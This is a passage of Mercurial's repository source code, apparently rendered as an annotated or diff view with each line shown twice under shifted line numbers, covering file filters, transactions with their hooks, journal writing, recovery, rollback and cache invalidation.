1028 fn = filterfn
1029 fn = filterfn
1029 params = cmd[len(name):].lstrip()
1030 params = cmd[len(name):].lstrip()
1030 break
1031 break
1031 if not fn:
1032 if not fn:
1032 fn = lambda s, c, **kwargs: util.filter(s, c)
1033 fn = lambda s, c, **kwargs: util.filter(s, c)
1033 # Wrap old filters not supporting keyword arguments
1034 # Wrap old filters not supporting keyword arguments
1034 if not inspect.getargspec(fn)[2]:
1035 if not inspect.getargspec(fn)[2]:
1035 oldfn = fn
1036 oldfn = fn
1036 fn = lambda s, c, **kwargs: oldfn(s, c)
1037 fn = lambda s, c, **kwargs: oldfn(s, c)
1037 l.append((mf, fn, params))
1038 l.append((mf, fn, params))
1038 self.filterpats[filter] = l
1039 self.filterpats[filter] = l
1039 return self.filterpats[filter]
1040 return self.filterpats[filter]
1040
1041
1041 def _filter(self, filterpats, filename, data):
1042 def _filter(self, filterpats, filename, data):
1042 for mf, fn, cmd in filterpats:
1043 for mf, fn, cmd in filterpats:
1043 if mf(filename):
1044 if mf(filename):
1044 self.ui.debug("filtering %s through %s\n" % (filename, cmd))
1045 self.ui.debug("filtering %s through %s\n" % (filename, cmd))
1045 data = fn(data, cmd, ui=self.ui, repo=self, filename=filename)
1046 data = fn(data, cmd, ui=self.ui, repo=self, filename=filename)
1046 break
1047 break
1047
1048
1048 return data
1049 return data
1049
1050
1050 @unfilteredpropertycache
1051 @unfilteredpropertycache
1051 def _encodefilterpats(self):
1052 def _encodefilterpats(self):
1052 return self._loadfilter('encode')
1053 return self._loadfilter('encode')
1053
1054
1054 @unfilteredpropertycache
1055 @unfilteredpropertycache
1055 def _decodefilterpats(self):
1056 def _decodefilterpats(self):
1056 return self._loadfilter('decode')
1057 return self._loadfilter('decode')
1057
1058
1058 def adddatafilter(self, name, filter):
1059 def adddatafilter(self, name, filter):
1059 self._datafilters[name] = filter
1060 self._datafilters[name] = filter
1060
1061
1061 def wread(self, filename):
1062 def wread(self, filename):
1062 if self.wvfs.islink(filename):
1063 if self.wvfs.islink(filename):
1063 data = self.wvfs.readlink(filename)
1064 data = self.wvfs.readlink(filename)
1064 else:
1065 else:
1065 data = self.wvfs.read(filename)
1066 data = self.wvfs.read(filename)
1066 return self._filter(self._encodefilterpats, filename, data)
1067 return self._filter(self._encodefilterpats, filename, data)
1067
1068
1068 def wwrite(self, filename, data, flags, backgroundclose=False):
1069 def wwrite(self, filename, data, flags, backgroundclose=False):
1069 """write ``data`` into ``filename`` in the working directory
1070 """write ``data`` into ``filename`` in the working directory
1070
1071
1071 This returns length of written (maybe decoded) data.
1072 This returns length of written (maybe decoded) data.
1072 """
1073 """
1073 data = self._filter(self._decodefilterpats, filename, data)
1074 data = self._filter(self._decodefilterpats, filename, data)
1074 if 'l' in flags:
1075 if 'l' in flags:
1075 self.wvfs.symlink(data, filename)
1076 self.wvfs.symlink(data, filename)
1076 else:
1077 else:
1077 self.wvfs.write(filename, data, backgroundclose=backgroundclose)
1078 self.wvfs.write(filename, data, backgroundclose=backgroundclose)
1078 if 'x' in flags:
1079 if 'x' in flags:
1079 self.wvfs.setflags(filename, False, True)
1080 self.wvfs.setflags(filename, False, True)
1080 return len(data)
1081 return len(data)
1081
1082
1082 def wwritedata(self, filename, data):
1083 def wwritedata(self, filename, data):
1083 return self._filter(self._decodefilterpats, filename, data)
1084 return self._filter(self._decodefilterpats, filename, data)
1084
1085
1085 def currenttransaction(self):
1086 def currenttransaction(self):
1086 """return the current transaction or None if non exists"""
1087 """return the current transaction or None if non exists"""
1087 if self._transref:
1088 if self._transref:
1088 tr = self._transref()
1089 tr = self._transref()
1089 else:
1090 else:
1090 tr = None
1091 tr = None
1091
1092
1092 if tr and tr.running():
1093 if tr and tr.running():
1093 return tr
1094 return tr
1094 return None
1095 return None
1095
1096
1096 def transaction(self, desc, report=None):
1097 def transaction(self, desc, report=None):
1097 if (self.ui.configbool('devel', 'all-warnings')
1098 if (self.ui.configbool('devel', 'all-warnings')
1098 or self.ui.configbool('devel', 'check-locks')):
1099 or self.ui.configbool('devel', 'check-locks')):
1099 if self._currentlock(self._lockref) is None:
1100 if self._currentlock(self._lockref) is None:
1100 raise error.ProgrammingError('transaction requires locking')
1101 raise error.ProgrammingError('transaction requires locking')
1101 tr = self.currenttransaction()
1102 tr = self.currenttransaction()
1102 if tr is not None:
1103 if tr is not None:
1103 scmutil.registersummarycallback(self, tr, desc)
1104 scmutil.registersummarycallback(self, tr, desc)
1104 return tr.nest()
1105 return tr.nest()
1105
1106
1106 # abort here if the journal already exists
1107 # abort here if the journal already exists
1107 if self.svfs.exists("journal"):
1108 if self.svfs.exists("journal"):
1108 raise error.RepoError(
1109 raise error.RepoError(
1109 _("abandoned transaction found"),
1110 _("abandoned transaction found"),
1110 hint=_("run 'hg recover' to clean up transaction"))
1111 hint=_("run 'hg recover' to clean up transaction"))
1111
1112
1112 idbase = "%.40f#%f" % (random.random(), time.time())
1113 idbase = "%.40f#%f" % (random.random(), time.time())
1113 ha = hex(hashlib.sha1(idbase).digest())
1114 ha = hex(hashlib.sha1(idbase).digest())
1114 txnid = 'TXN:' + ha
1115 txnid = 'TXN:' + ha
1115 self.hook('pretxnopen', throw=True, txnname=desc, txnid=txnid)
1116 self.hook('pretxnopen', throw=True, txnname=desc, txnid=txnid)
1116
1117
1117 self._writejournal(desc)
1118 self._writejournal(desc)
1118 renames = [(vfs, x, undoname(x)) for vfs, x in self._journalfiles()]
1119 renames = [(vfs, x, undoname(x)) for vfs, x in self._journalfiles()]
1119 if report:
1120 if report:
1120 rp = report
1121 rp = report
1121 else:
1122 else:
1122 rp = self.ui.warn
1123 rp = self.ui.warn
1123 vfsmap = {'plain': self.vfs} # root of .hg/
1124 vfsmap = {'plain': self.vfs} # root of .hg/
1124 # we must avoid cyclic reference between repo and transaction.
1125 # we must avoid cyclic reference between repo and transaction.
1125 reporef = weakref.ref(self)
1126 reporef = weakref.ref(self)
1126 # Code to track tag movement
1127 # Code to track tag movement
1127 #
1128 #
1128 # Since tags are all handled as file content, it is actually quite hard
1129 # Since tags are all handled as file content, it is actually quite hard
1129 # to track these movement from a code perspective. So we fallback to a
1130 # to track these movement from a code perspective. So we fallback to a
1130 # tracking at the repository level. One could envision to track changes
1131 # tracking at the repository level. One could envision to track changes
1131 # to the '.hgtags' file through changegroup apply but that fails to
1132 # to the '.hgtags' file through changegroup apply but that fails to
1132 # cope with case where transaction expose new heads without changegroup
1133 # cope with case where transaction expose new heads without changegroup
1133 # being involved (eg: phase movement).
1134 # being involved (eg: phase movement).
1134 #
1135 #
1135 # For now, We gate the feature behind a flag since this likely comes
1136 # For now, We gate the feature behind a flag since this likely comes
1136 # with performance impacts. The current code run more often than needed
1137 # with performance impacts. The current code run more often than needed
1137 # and do not use caches as much as it could. The current focus is on
1138 # and do not use caches as much as it could. The current focus is on
1138 # the behavior of the feature so we disable it by default. The flag
1139 # the behavior of the feature so we disable it by default. The flag
1139 # will be removed when we are happy with the performance impact.
1140 # will be removed when we are happy with the performance impact.
1140 #
1141 #
1141 # Once this feature is no longer experimental move the following
1142 # Once this feature is no longer experimental move the following
1142 # documentation to the appropriate help section:
1143 # documentation to the appropriate help section:
1143 #
1144 #
1144 # The ``HG_TAG_MOVED`` variable will be set if the transaction touched
1145 # The ``HG_TAG_MOVED`` variable will be set if the transaction touched
1145 # tags (new or changed or deleted tags). In addition the details of
1146 # tags (new or changed or deleted tags). In addition the details of
1146 # these changes are made available in a file at:
1147 # these changes are made available in a file at:
1147 # ``REPOROOT/.hg/changes/tags.changes``.
1148 # ``REPOROOT/.hg/changes/tags.changes``.
1148 # Make sure you check for HG_TAG_MOVED before reading that file as it
1149 # Make sure you check for HG_TAG_MOVED before reading that file as it
1149 # might exist from a previous transaction even if no tag were touched
1150 # might exist from a previous transaction even if no tag were touched
1150 # in this one. Changes are recorded in a line base format::
1151 # in this one. Changes are recorded in a line base format::
1151 #
1152 #
1152 # <action> <hex-node> <tag-name>\n
1153 # <action> <hex-node> <tag-name>\n
1153 #
1154 #
1154 # Actions are defined as follow:
1155 # Actions are defined as follow:
1155 # "-R": tag is removed,
1156 # "-R": tag is removed,
1156 # "+A": tag is added,
1157 # "+A": tag is added,
1157 # "-M": tag is moved (old value),
1158 # "-M": tag is moved (old value),
1158 # "+M": tag is moved (new value),
1159 # "+M": tag is moved (new value),
1159 tracktags = lambda x: None
1160 tracktags = lambda x: None
1160 # experimental config: experimental.hook-track-tags
1161 # experimental config: experimental.hook-track-tags
1161 shouldtracktags = self.ui.configbool('experimental', 'hook-track-tags')
1162 shouldtracktags = self.ui.configbool('experimental', 'hook-track-tags')
1162 if desc != 'strip' and shouldtracktags:
1163 if desc != 'strip' and shouldtracktags:
1163 oldheads = self.changelog.headrevs()
1164 oldheads = self.changelog.headrevs()
1164 def tracktags(tr2):
1165 def tracktags(tr2):
1165 repo = reporef()
1166 repo = reporef()
1166 oldfnodes = tagsmod.fnoderevs(repo.ui, repo, oldheads)
1167 oldfnodes = tagsmod.fnoderevs(repo.ui, repo, oldheads)
1167 newheads = repo.changelog.headrevs()
1168 newheads = repo.changelog.headrevs()
1168 newfnodes = tagsmod.fnoderevs(repo.ui, repo, newheads)
1169 newfnodes = tagsmod.fnoderevs(repo.ui, repo, newheads)
1169 # notes: we compare lists here.
1170 # notes: we compare lists here.
1170 # As we do it only once buiding set would not be cheaper
1171 # As we do it only once buiding set would not be cheaper
1171 changes = tagsmod.difftags(repo.ui, repo, oldfnodes, newfnodes)
1172 changes = tagsmod.difftags(repo.ui, repo, oldfnodes, newfnodes)
1172 if changes:
1173 if changes:
1173 tr2.hookargs['tag_moved'] = '1'
1174 tr2.hookargs['tag_moved'] = '1'
1174 with repo.vfs('changes/tags.changes', 'w',
1175 with repo.vfs('changes/tags.changes', 'w',
1175 atomictemp=True) as changesfile:
1176 atomictemp=True) as changesfile:
1176 # note: we do not register the file to the transaction
1177 # note: we do not register the file to the transaction
1177 # because we needs it to still exist on the transaction
1178 # because we needs it to still exist on the transaction
1178 # is close (for txnclose hooks)
1179 # is close (for txnclose hooks)
1179 tagsmod.writediff(changesfile, changes)
1180 tagsmod.writediff(changesfile, changes)
1180 def validate(tr2):
1181 def validate(tr2):
1181 """will run pre-closing hooks"""
1182 """will run pre-closing hooks"""
1182 # XXX the transaction API is a bit lacking here so we take a hacky
1183 # XXX the transaction API is a bit lacking here so we take a hacky
1183 # path for now
1184 # path for now
1184 #
1185 #
1185 # We cannot add this as a "pending" hooks since the 'tr.hookargs'
1186 # We cannot add this as a "pending" hooks since the 'tr.hookargs'
1186 # dict is copied before these run. In addition we needs the data
1187 # dict is copied before these run. In addition we needs the data
1187 # available to in memory hooks too.
1188 # available to in memory hooks too.
1188 #
1189 #
1189 # Moreover, we also need to make sure this runs before txnclose
1190 # Moreover, we also need to make sure this runs before txnclose
1190 # hooks and there is no "pending" mechanism that would execute
1191 # hooks and there is no "pending" mechanism that would execute
1191 # logic only if hooks are about to run.
1192 # logic only if hooks are about to run.
1192 #
1193 #
1193 # Fixing this limitation of the transaction is also needed to track
1194 # Fixing this limitation of the transaction is also needed to track
1194 # other families of changes (bookmarks, phases, obsolescence).
1195 # other families of changes (bookmarks, phases, obsolescence).
1195 #
1196 #
1196 # This will have to be fixed before we remove the experimental
1197 # This will have to be fixed before we remove the experimental
1197 # gating.
1198 # gating.
1198 tracktags(tr2)
1199 tracktags(tr2)
1199 reporef().hook('pretxnclose', throw=True,
1200 reporef().hook('pretxnclose', throw=True,
1200 txnname=desc, **pycompat.strkwargs(tr.hookargs))
1201 txnname=desc, **pycompat.strkwargs(tr.hookargs))
1201 def releasefn(tr, success):
1202 def releasefn(tr, success):
1202 repo = reporef()
1203 repo = reporef()
1203 if success:
1204 if success:
1204 # this should be explicitly invoked here, because
1205 # this should be explicitly invoked here, because
1205 # in-memory changes aren't written out at closing
1206 # in-memory changes aren't written out at closing
1206 # transaction, if tr.addfilegenerator (via
1207 # transaction, if tr.addfilegenerator (via
1207 # dirstate.write or so) isn't invoked while
1208 # dirstate.write or so) isn't invoked while
1208 # transaction running
1209 # transaction running
1209 repo.dirstate.write(None)
1210 repo.dirstate.write(None)
1210 else:
1211 else:
1211 # discard all changes (including ones already written
1212 # discard all changes (including ones already written
1212 # out) in this transaction
1213 # out) in this transaction
1213 repo.dirstate.restorebackup(None, 'journal.dirstate')
1214 repo.dirstate.restorebackup(None, 'journal.dirstate')
1214
1215
1215 repo.invalidate(clearfilecache=True)
1216 repo.invalidate(clearfilecache=True)
1216
1217
1217 tr = transaction.transaction(rp, self.svfs, vfsmap,
1218 tr = transaction.transaction(rp, self.svfs, vfsmap,
1218 "journal",
1219 "journal",
1219 "undo",
1220 "undo",
1220 aftertrans(renames),
1221 aftertrans(renames),
1221 self.store.createmode,
1222 self.store.createmode,
1222 validator=validate,
1223 validator=validate,
1223 releasefn=releasefn,
1224 releasefn=releasefn,
1224 checkambigfiles=_cachedfiles)
1225 checkambigfiles=_cachedfiles)
1225 tr.changes['revs'] = set()
1226 tr.changes['revs'] = set()
1226 tr.changes['obsmarkers'] = set()
1227 tr.changes['obsmarkers'] = set()
1227 tr.changes['phases'] = {}
1228 tr.changes['phases'] = {}
1228 tr.changes['bookmarks'] = {}
1229 tr.changes['bookmarks'] = {}
1229
1230
1230 tr.hookargs['txnid'] = txnid
1231 tr.hookargs['txnid'] = txnid
1231 # note: writing the fncache only during finalize mean that the file is
1232 # note: writing the fncache only during finalize mean that the file is
1232 # outdated when running hooks. As fncache is used for streaming clone,
1233 # outdated when running hooks. As fncache is used for streaming clone,
1233 # this is not expected to break anything that happen during the hooks.
1234 # this is not expected to break anything that happen during the hooks.
1234 tr.addfinalize('flush-fncache', self.store.write)
1235 tr.addfinalize('flush-fncache', self.store.write)
1235 def txnclosehook(tr2):
1236 def txnclosehook(tr2):
1236 """To be run if transaction is successful, will schedule a hook run
1237 """To be run if transaction is successful, will schedule a hook run
1237 """
1238 """
1238 # Don't reference tr2 in hook() so we don't hold a reference.
1239 # Don't reference tr2 in hook() so we don't hold a reference.
1239 # This reduces memory consumption when there are multiple
1240 # This reduces memory consumption when there are multiple
1240 # transactions per lock. This can likely go away if issue5045
1241 # transactions per lock. This can likely go away if issue5045
1241 # fixes the function accumulation.
1242 # fixes the function accumulation.
1242 hookargs = tr2.hookargs
1243 hookargs = tr2.hookargs
1243
1244
1244 def hook():
1245 def hook():
1245 reporef().hook('txnclose', throw=False, txnname=desc,
1246 reporef().hook('txnclose', throw=False, txnname=desc,
1246 **pycompat.strkwargs(hookargs))
1247 **pycompat.strkwargs(hookargs))
1247 reporef()._afterlock(hook)
1248 reporef()._afterlock(hook)
1248 tr.addfinalize('txnclose-hook', txnclosehook)
1249 tr.addfinalize('txnclose-hook', txnclosehook)
1249 tr.addpostclose('warms-cache', self._buildcacheupdater(tr))
1250 tr.addpostclose('warms-cache', self._buildcacheupdater(tr))
1250 def txnaborthook(tr2):
1251 def txnaborthook(tr2):
1251 """To be run if transaction is aborted
1252 """To be run if transaction is aborted
1252 """
1253 """
1253 reporef().hook('txnabort', throw=False, txnname=desc,
1254 reporef().hook('txnabort', throw=False, txnname=desc,
1254 **tr2.hookargs)
1255 **tr2.hookargs)
1255 tr.addabort('txnabort-hook', txnaborthook)
1256 tr.addabort('txnabort-hook', txnaborthook)
1256 # avoid eager cache invalidation. in-memory data should be identical
1257 # avoid eager cache invalidation. in-memory data should be identical
1257 # to stored data if transaction has no error.
1258 # to stored data if transaction has no error.
1258 tr.addpostclose('refresh-filecachestats', self._refreshfilecachestats)
1259 tr.addpostclose('refresh-filecachestats', self._refreshfilecachestats)
1259 self._transref = weakref.ref(tr)
1260 self._transref = weakref.ref(tr)
1260 scmutil.registersummarycallback(self, tr, desc)
1261 scmutil.registersummarycallback(self, tr, desc)
1261 return tr
1262 return tr
1262
1263
1263 def _journalfiles(self):
1264 def _journalfiles(self):
1264 return ((self.svfs, 'journal'),
1265 return ((self.svfs, 'journal'),
1265 (self.vfs, 'journal.dirstate'),
1266 (self.vfs, 'journal.dirstate'),
1266 (self.vfs, 'journal.branch'),
1267 (self.vfs, 'journal.branch'),
1267 (self.vfs, 'journal.desc'),
1268 (self.vfs, 'journal.desc'),
1268 (self.vfs, 'journal.bookmarks'),
1269 (self.vfs, 'journal.bookmarks'),
1269 (self.svfs, 'journal.phaseroots'))
1270 (self.svfs, 'journal.phaseroots'))
1270
1271
1271 def undofiles(self):
1272 def undofiles(self):
1272 return [(vfs, undoname(x)) for vfs, x in self._journalfiles()]
1273 return [(vfs, undoname(x)) for vfs, x in self._journalfiles()]
1273
1274
1274 @unfilteredmethod
1275 @unfilteredmethod
1275 def _writejournal(self, desc):
1276 def _writejournal(self, desc):
1276 self.dirstate.savebackup(None, 'journal.dirstate')
1277 self.dirstate.savebackup(None, 'journal.dirstate')
1277 self.vfs.write("journal.branch",
1278 self.vfs.write("journal.branch",
1278 encoding.fromlocal(self.dirstate.branch()))
1279 encoding.fromlocal(self.dirstate.branch()))
1279 self.vfs.write("journal.desc",
1280 self.vfs.write("journal.desc",
1280 "%d\n%s\n" % (len(self), desc))
1281 "%d\n%s\n" % (len(self), desc))
1281 self.vfs.write("journal.bookmarks",
1282 self.vfs.write("journal.bookmarks",
1282 self.vfs.tryread("bookmarks"))
1283 self.vfs.tryread("bookmarks"))
1283 self.svfs.write("journal.phaseroots",
1284 self.svfs.write("journal.phaseroots",
1284 self.svfs.tryread("phaseroots"))
1285 self.svfs.tryread("phaseroots"))
1285
1286
1286 def recover(self):
1287 def recover(self):
1287 with self.lock():
1288 with self.lock():
1288 if self.svfs.exists("journal"):
1289 if self.svfs.exists("journal"):
1289 self.ui.status(_("rolling back interrupted transaction\n"))
1290 self.ui.status(_("rolling back interrupted transaction\n"))
1290 vfsmap = {'': self.svfs,
1291 vfsmap = {'': self.svfs,
1291 'plain': self.vfs,}
1292 'plain': self.vfs,}
1292 transaction.rollback(self.svfs, vfsmap, "journal",
1293 transaction.rollback(self.svfs, vfsmap, "journal",
1293 self.ui.warn,
1294 self.ui.warn,
1294 checkambigfiles=_cachedfiles)
1295 checkambigfiles=_cachedfiles)
1295 self.invalidate()
1296 self.invalidate()
1296 return True
1297 return True
1297 else:
1298 else:
1298 self.ui.warn(_("no interrupted transaction available\n"))
1299 self.ui.warn(_("no interrupted transaction available\n"))
1299 return False
1300 return False
1300
1301
1301 def rollback(self, dryrun=False, force=False):
1302 def rollback(self, dryrun=False, force=False):
1302 wlock = lock = dsguard = None
1303 wlock = lock = dsguard = None
1303 try:
1304 try:
1304 wlock = self.wlock()
1305 wlock = self.wlock()
1305 lock = self.lock()
1306 lock = self.lock()
1306 if self.svfs.exists("undo"):
1307 if self.svfs.exists("undo"):
1307 dsguard = dirstateguard.dirstateguard(self, 'rollback')
1308 dsguard = dirstateguard.dirstateguard(self, 'rollback')
1308
1309
1309 return self._rollback(dryrun, force, dsguard)
1310 return self._rollback(dryrun, force, dsguard)
1310 else:
1311 else:
1311 self.ui.warn(_("no rollback information available\n"))
1312 self.ui.warn(_("no rollback information available\n"))
1312 return 1
1313 return 1
1313 finally:
1314 finally:
1314 release(dsguard, lock, wlock)
1315 release(dsguard, lock, wlock)
1315
1316
1316 @unfilteredmethod # Until we get smarter cache management
1317 @unfilteredmethod # Until we get smarter cache management
1317 def _rollback(self, dryrun, force, dsguard):
1318 def _rollback(self, dryrun, force, dsguard):
1318 ui = self.ui
1319 ui = self.ui
1319 try:
1320 try:
1320 args = self.vfs.read('undo.desc').splitlines()
1321 args = self.vfs.read('undo.desc').splitlines()
1321 (oldlen, desc, detail) = (int(args[0]), args[1], None)
1322 (oldlen, desc, detail) = (int(args[0]), args[1], None)
1322 if len(args) >= 3:
1323 if len(args) >= 3:
1323 detail = args[2]
1324 detail = args[2]
1324 oldtip = oldlen - 1
1325 oldtip = oldlen - 1
1325
1326
1326 if detail and ui.verbose:
1327 if detail and ui.verbose:
1327 msg = (_('repository tip rolled back to revision %d'
1328 msg = (_('repository tip rolled back to revision %d'
1328 ' (undo %s: %s)\n')
1329 ' (undo %s: %s)\n')
1329 % (oldtip, desc, detail))
1330 % (oldtip, desc, detail))
1330 else:
1331 else:
1331 msg = (_('repository tip rolled back to revision %d'
1332 msg = (_('repository tip rolled back to revision %d'
1332 ' (undo %s)\n')
1333 ' (undo %s)\n')
1333 % (oldtip, desc))
1334 % (oldtip, desc))
1334 except IOError:
1335 except IOError:
1335 msg = _('rolling back unknown transaction\n')
1336 msg = _('rolling back unknown transaction\n')
1336 desc = None
1337 desc = None
1337
1338
1338 if not force and self['.'] != self['tip'] and desc == 'commit':
1339 if not force and self['.'] != self['tip'] and desc == 'commit':
1339 raise error.Abort(
1340 raise error.Abort(
1340 _('rollback of last commit while not checked out '
1341 _('rollback of last commit while not checked out '
1341 'may lose data'), hint=_('use -f to force'))
1342 'may lose data'), hint=_('use -f to force'))
1342
1343
1343 ui.status(msg)
1344 ui.status(msg)
1344 if dryrun:
1345 if dryrun:
1345 return 0
1346 return 0
1346
1347
1347 parents = self.dirstate.parents()
1348 parents = self.dirstate.parents()
1348 self.destroying()
1349 self.destroying()
1349 vfsmap = {'plain': self.vfs, '': self.svfs}
1350 vfsmap = {'plain': self.vfs, '': self.svfs}
1350 transaction.rollback(self.svfs, vfsmap, 'undo', ui.warn,
1351 transaction.rollback(self.svfs, vfsmap, 'undo', ui.warn,
1351 checkambigfiles=_cachedfiles)
1352 checkambigfiles=_cachedfiles)
1352 if self.vfs.exists('undo.bookmarks'):
1353 if self.vfs.exists('undo.bookmarks'):
1353 self.vfs.rename('undo.bookmarks', 'bookmarks', checkambig=True)
1354 self.vfs.rename('undo.bookmarks', 'bookmarks', checkambig=True)
1354 if self.svfs.exists('undo.phaseroots'):
1355 if self.svfs.exists('undo.phaseroots'):
1355 self.svfs.rename('undo.phaseroots', 'phaseroots', checkambig=True)
1356 self.svfs.rename('undo.phaseroots', 'phaseroots', checkambig=True)
1356 self.invalidate()
1357 self.invalidate()
1357
1358
1358 parentgone = (parents[0] not in self.changelog.nodemap or
1359 parentgone = (parents[0] not in self.changelog.nodemap or
1359 parents[1] not in self.changelog.nodemap)
1360 parents[1] not in self.changelog.nodemap)
1360 if parentgone:
1361 if parentgone:
1361 # prevent dirstateguard from overwriting already restored one
1362 # prevent dirstateguard from overwriting already restored one
1362 dsguard.close()
1363 dsguard.close()
1363
1364
1364 self.dirstate.restorebackup(None, 'undo.dirstate')
1365 self.dirstate.restorebackup(None, 'undo.dirstate')
1365 try:
1366 try:
1366 branch = self.vfs.read('undo.branch')
1367 branch = self.vfs.read('undo.branch')
1367 self.dirstate.setbranch(encoding.tolocal(branch))
1368 self.dirstate.setbranch(encoding.tolocal(branch))
1368 except IOError:
1369 except IOError:
1369 ui.warn(_('named branch could not be reset: '
1370 ui.warn(_('named branch could not be reset: '
1370 'current branch is still \'%s\'\n')
1371 'current branch is still \'%s\'\n')
1371 % self.dirstate.branch())
1372 % self.dirstate.branch())
1372
1373
1373 parents = tuple([p.rev() for p in self[None].parents()])
1374 parents = tuple([p.rev() for p in self[None].parents()])
1374 if len(parents) > 1:
1375 if len(parents) > 1:
1375 ui.status(_('working directory now based on '
1376 ui.status(_('working directory now based on '
1376 'revisions %d and %d\n') % parents)
1377 'revisions %d and %d\n') % parents)
1377 else:
1378 else:
1378 ui.status(_('working directory now based on '
1379 ui.status(_('working directory now based on '
1379 'revision %d\n') % parents)
1380 'revision %d\n') % parents)
1380 mergemod.mergestate.clean(self, self['.'].node())
1381 mergemod.mergestate.clean(self, self['.'].node())
1381
1382
1382 # TODO: if we know which new heads may result from this rollback, pass
1383 # TODO: if we know which new heads may result from this rollback, pass
1383 # them to destroy(), which will prevent the branchhead cache from being
1384 # them to destroy(), which will prevent the branchhead cache from being
1384 # invalidated.
1385 # invalidated.
1385 self.destroyed()
1386 self.destroyed()
1386 return 0
1387 return 0
1387
1388
1388 def _buildcacheupdater(self, newtransaction):
1389 def _buildcacheupdater(self, newtransaction):
1389 """called during transaction to build the callback updating cache
1390 """called during transaction to build the callback updating cache
1390
1391
1391 Lives on the repository to help extension who might want to augment
1392 Lives on the repository to help extension who might want to augment
1392 this logic. For this purpose, the created transaction is passed to the
1393 this logic. For this purpose, the created transaction is passed to the
1393 method.
1394 method.
1394 """
1395 """
1395 # we must avoid cyclic reference between repo and transaction.
1396 # we must avoid cyclic reference between repo and transaction.
1396 reporef = weakref.ref(self)
1397 reporef = weakref.ref(self)
1397 def updater(tr):
1398 def updater(tr):
1398 repo = reporef()
1399 repo = reporef()
1399 repo.updatecaches(tr)
1400 repo.updatecaches(tr)
1400 return updater
1401 return updater
1401
1402
1402 @unfilteredmethod
1403 @unfilteredmethod
1403 def updatecaches(self, tr=None):
1404 def updatecaches(self, tr=None):
1404 """warm appropriate caches
1405 """warm appropriate caches
1405
1406
1406 If this function is called after a transaction closed. The transaction
1407 If this function is called after a transaction closed. The transaction
1407 will be available in the 'tr' argument. This can be used to selectively
1408 will be available in the 'tr' argument. This can be used to selectively
1408 update caches relevant to the changes in that transaction.
1409 update caches relevant to the changes in that transaction.
1409 """
1410 """
1410 if tr is not None and tr.hookargs.get('source') == 'strip':
1411 if tr is not None and tr.hookargs.get('source') == 'strip':
1411 # During strip, many caches are invalid but
1412 # During strip, many caches are invalid but
1412 # later call to `destroyed` will refresh them.
1413 # later call to `destroyed` will refresh them.
1413 return
1414 return
1414
1415
1415 if tr is None or tr.changes['revs']:
1416 if tr is None or tr.changes['revs']:
1416 # updating the unfiltered branchmap should refresh all the others,
1417 # updating the unfiltered branchmap should refresh all the others,
1417 self.ui.debug('updating the branch cache\n')
1418 self.ui.debug('updating the branch cache\n')
1418 branchmap.updatecache(self.filtered('served'))
1419 branchmap.updatecache(self.filtered('served'))
1419
1420
1420 def invalidatecaches(self):
1421 def invalidatecaches(self):
1421
1422
1422 if '_tagscache' in vars(self):
1423 if '_tagscache' in vars(self):
1423 # can't use delattr on proxy
1424 # can't use delattr on proxy
1424 del self.__dict__['_tagscache']
1425 del self.__dict__['_tagscache']
1425
1426
1426 self.unfiltered()._branchcaches.clear()
1427 self.unfiltered()._branchcaches.clear()
1427 self.invalidatevolatilesets()
1428 self.invalidatevolatilesets()
1428 self._sparsesignaturecache.clear()
1429 self._sparsesignaturecache.clear()
1429
1430
1430 def invalidatevolatilesets(self):
1431 def invalidatevolatilesets(self):
1431 self.filteredrevcache.clear()
1432 self.filteredrevcache.clear()
1432 obsolete.clearobscaches(self)
1433 obsolete.clearobscaches(self)
1433
1434
1434 def invalidatedirstate(self):
1435 def invalidatedirstate(self):
1435 '''Invalidates the dirstate, causing the next call to dirstate
1436 '''Invalidates the dirstate, causing the next call to dirstate
1436 to check if it was modified since the last time it was read,
1437 to check if it was modified since the last time it was read,
1437 rereading it if it has.
1438 rereading it if it has.
1438
1439
1439 This is different to dirstate.invalidate() that it doesn't always
1440 This is different to dirstate.invalidate() that it doesn't always
1440 rereads the dirstate. Use dirstate.invalidate() if you want to
1441 rereads the dirstate. Use dirstate.invalidate() if you want to
1441 explicitly read the dirstate again (i.e. restoring it to a previous
1442 explicitly read the dirstate again (i.e. restoring it to a previous
1442 known good state).'''
1443 known good state).'''
1443 if hasunfilteredcache(self, 'dirstate'):
1444 if hasunfilteredcache(self, 'dirstate'):
1444 for k in self.dirstate._filecache:
1445 for k in self.dirstate._filecache:
1445 try:
1446 try:
1446 delattr(self.dirstate, k)
1447 delattr(self.dirstate, k)
1447 except AttributeError:
1448 except AttributeError:
1448 pass
1449 pass
1449 delattr(self.unfiltered(), 'dirstate')
1450 delattr(self.unfiltered(), 'dirstate')
1450
1451
1451 def invalidate(self, clearfilecache=False):
1452 def invalidate(self, clearfilecache=False):
1452 '''Invalidates both store and non-store parts other than dirstate
1453 '''Invalidates both store and non-store parts other than dirstate
1453
1454
1454 If a transaction is running, invalidation of store is omitted,
1455 If a transaction is running, invalidation of store is omitted,
1455 because discarding in-memory changes might cause inconsistency
1456 because discarding in-memory changes might cause inconsistency
1456 (e.g. incomplete fncache causes unintentional failure, but
1457 (e.g. incomplete fncache causes unintentional failure, but
1457 redundant one doesn't).
1458 redundant one doesn't).
1458 '''
1459 '''
1459 unfiltered = self.unfiltered() # all file caches are stored unfiltered
1460 unfiltered = self.unfiltered() # all file caches are stored unfiltered
1460 for k in list(self._filecache.keys()):
1461 for k in list(self._filecache.keys()):
1461 # dirstate is invalidated separately in invalidatedirstate()
1462 # dirstate is invalidated separately in invalidatedirstate()
1462 if k == 'dirstate':
1463 if k == 'dirstate':
1463 continue
1464 continue
1464 if (k == 'changelog' and
1465 if (k == 'changelog' and
1465 self.currenttransaction() and
1466 self.currenttransaction() and
1466 self.changelog._delayed):
1467 self.changelog._delayed):
1467 # The changelog object may store unwritten revisions. We don't
1468 # The changelog object may store unwritten revisions. We don't
1468 # want to lose them.
1469 # want to lose them.
1469 # TODO: Solve the problem instead of working around it.
1470 # TODO: Solve the problem instead of working around it.
1470 continue
1471 continue
1471
1472
1472 if clearfilecache:
1473 if clearfilecache:
1473 del self._filecache[k]
1474 del self._filecache[k]
1474 try:
1475 try:
1475 delattr(unfiltered, k)
1476 delattr(unfiltered, k)
1476 except AttributeError:
1477 except AttributeError:
1477 pass
1478 pass
1478 self.invalidatecaches()
1479 self.invalidatecaches()
1479 if not self.currenttransaction():
1480 if not self.currenttransaction():
1480 # TODO: Changing contents of store outside transaction
1481 # TODO: Changing contents of store outside transaction
1481 # causes inconsistency. We should make in-memory store
1482 # causes inconsistency. We should make in-memory store
1482 # changes detectable, and abort if changed.
1483 # changes detectable, and abort if changed.
1483 self.store.invalidatecaches()
1484 self.store.invalidatecaches()
1484
1485
1485 def invalidateall(self):
